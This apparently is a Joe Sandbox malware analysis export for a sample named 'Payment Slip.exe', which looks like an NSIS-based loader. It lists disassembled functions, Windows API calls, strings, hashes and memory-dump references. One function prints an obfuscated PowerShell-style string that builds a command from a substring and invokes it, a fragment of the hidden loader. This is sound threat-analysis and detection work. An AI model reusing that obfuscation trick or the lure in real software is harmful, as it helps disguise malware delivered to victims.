Opcode Fuzzy Hash: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 004045C8 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", xrefs: 004045E1
: Completed, xrefs: 00404729, 0040472E, 00404739
A, xrefs: 004046EB
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00404718

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: ';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "$: Completed$A$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
API String ID: 2246997448-460327463
Opcode ID: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD

Strings

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 004020F5

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
API String ID: 542301482-449055245
Opcode ID: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
Opcode Fuzzy Hash: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55

Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
Opcode Fuzzy Hash: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A

Function 004042CA Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

N, xrefs: 00404466
: Completed, xrefs: 004044A7
open, xrefs: 004044D9
AB@, xrefs: 004044D6

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$AB@$N$open
API String ID: 3615053054-1317861079
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Strings

[Rename], xrefs: 00405CE8, 00405CFA
peB, xrefs: 00405C55
%ls=%ls, xrefs: 00405C74
NUL, xrefs: 00405C10
p]B, xrefs: 00405C0B

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

Strings

"C:\Users\user\Desktop\Payment Slip.exe", xrefs: 004061C0
C:\Users\user\AppData\Local\Temp\, xrefs: 0040617D, 00406182
*?|<>/":, xrefs: 004061CE

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Payment Slip.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-813433353
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
